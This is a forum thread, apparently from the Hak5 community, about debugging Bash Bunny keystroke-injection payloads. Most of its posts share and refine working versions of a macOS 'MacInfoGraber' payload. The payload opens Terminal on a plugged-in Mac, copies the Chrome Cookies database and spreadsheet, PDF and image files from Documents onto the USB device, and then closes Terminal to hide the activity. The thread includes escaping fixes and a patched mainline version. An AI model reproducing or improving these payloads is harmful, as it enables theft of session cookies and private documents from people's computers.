Jump to content

Mac&Linux ~/ = root


anode

Recommended Posts

For some reason when I quack a ~/ it is played back as /root/

~/ works fine manually typed in a terminal

I tried a simple just quack it into text editor and same results; /root/

MAC OSX 10.9 Mavericks.

edit:  Just tried on a Kali laptop same results.

Both machine bare iron, not VMs.

Edited by anode
Link to comment
Share on other sites

32 minutes ago, LowValueTarget said:

I would imagine that bash is expanding that path on the BB before it's sent as keystrokes. 

Try putting your quack strings in a text file and using `QUACK keystrokes.txt`

Yup that was it.  Saw another post, but it didn't sink in as to why.

Makes sense now.  Thanks!

Link to comment
Share on other sites

You can also just `\` escape symbols right in the QUACK directive.

 

QUACK cd $HOME

evaluates to

cd /root

whereas

QUACK cd \$HOME

literally types

cd $HOME

 

This also goes for ~ ; and | symbols. Check out what I mean in this practical example - https://github.com/hak5/bashbunny-payloads/pull/36

Edited by audibleblink
code blocks
  • Upvote 2
Link to comment
Share on other sites

cd ENTER works too.. I was just playing around with the MacInfoGraber payload by : kmakblob

 

and in order to get it to work I had to change it:

Original:

LED R
ATTACKMODE HID STORAGE
LOOTDIR=/loot/MacLoot
mkdir -p $LOOTDIR
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 8000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat ~/Library/Application\ Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/
QUACK ENTER
QUACK DELAY 1000
QUACK GUI q
QUACK DELAY 500
QUACK ENTER

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
if [ "$files" != "0" -o "$files2" != "0"]
then
# Got spreadsheet files
LED R B
else
LED R
# No spread sheets
fi

Post Fiddles - I had to escape spaces and even the escape of the escape space as well as other special chars to get it to work.. didn't try escaping ~

LED R G 100
ATTACKMODE HID STORAGE
LOOTDIR=loot/MacLoot
mkdir -p $LOOTDIR
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd
QUACK ENTER
QUACK STRING cd Library/Application\\ Support/Google/Chrome/Default/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cat Cookies \> /Volumes/BashBunny/$LOOTDIR/chromecookies.db
QUACK DELAY 1000
QUACK ENTER
QUACK STRING cd
QUACK ENTER
QUACK DELAY 1000
QUACK ENTER
QUACK STRING cd Documents
QUACK ENTER 
QUACK STRING cp *.xlsx *.xls *.pdf *.jpg /Volumes/BashBunny/$LOOTDIR/files/
#QUACK STRING cp -R Documents/ /Volumes/BashBunny/$LOOTDIR/files/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd
#QUACK GUI q
QUACK DELAY 2000
QUACK ENTER

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l)
QUACK STRING $files
if [ “$files” != “0”]
then
# Got files
LED G
else
LED R
# No files
fi
Link to comment
Share on other sites

Submitted a PR to fix in mainline. - https://github.com/hak5/bashbunny-payloads/issues/51

Basic changes:

  - fixes lootdir path
  - dont capitalize var names that aren't exported
  - indentation
  - escape shell characters that are passed to QUACK
  - account for variable copy times by joining cp and exit commands
  - sync the disk

 

LED G R
ATTACKMODE HID STORAGE

lootdir=loot/MacLoot
mkdir -p /root/udisk/$LOOTDIR

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

 

Edited by audibleblink
Link to comment
Share on other sites

wow.. this is almost identical to the changes I have been making since my last comment... Awesome.. (high five)

 

Is the lack of sync why I was never getting a success? If sync fixes this might be nice to add back in the logic for the led at the end indicating whether the files were found/copied..

 

Edited by Onus
Link to comment
Share on other sites

Just now, audibleblink said:

it's still in the github code, i only pasted changes here.

I gathered that.. I mean the old file didn't sync the file system and always went LED red even when there were files, would this fix that

Link to comment
Share on other sites

I just tried removing the kill terminal command so that I can use the terminal to log $files and editing your script above to look like this after the sync call:

# Sync filesystem
sync

files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l)
QUACK STRING $files
QUACK ENTER
if [ $files != 0]
then
# Got files
LED G
else
LED R
# No files
fi

I am perplexed why $files keeps reading as 0 even though I have copied 16 files.. if I run the same line in terminal myself: 

ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l 

I get 16 but the script keeps returning 0

Its stupid bells and whistles.. but damn it I want to know.

Link to comment
Share on other sites

I'm wondering if the /tools/ducky.py (which is called by QUACK) is running in a subshell. If the QUACK commands run async, then the script is running in its entirety before ever finishing the HID section of the payload.

Just a hypothesis, this is where my bash knowledge reaches its limits.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...